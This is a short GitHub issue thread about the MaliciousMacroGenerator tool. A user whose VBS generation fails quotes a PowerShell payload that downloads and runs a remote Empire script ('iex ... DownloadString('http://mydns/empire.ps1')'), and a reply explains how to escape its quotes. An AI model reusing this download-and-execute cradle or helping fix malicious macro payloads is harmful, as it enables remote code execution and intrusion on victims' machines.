Mr-Un1k0d3r/MaliciousMacroGenerator

error

Closed this issue · 1 comments

when i try to generate the vbs file, this error happens
selection_037

i already set my powershell payload in the json file, i try too put the exact location like this:
selection_035

but still doesnt work
i use kali linux and python 2.7
in addition, in the image, i use vbs in the output. but i already try with vba and i have the same error
and my payload is
"payload": "powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://mydns/empire.ps1')""

The double quotes in your payload need to be escaped:

"payload": "powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://mydns/empire.ps1')\""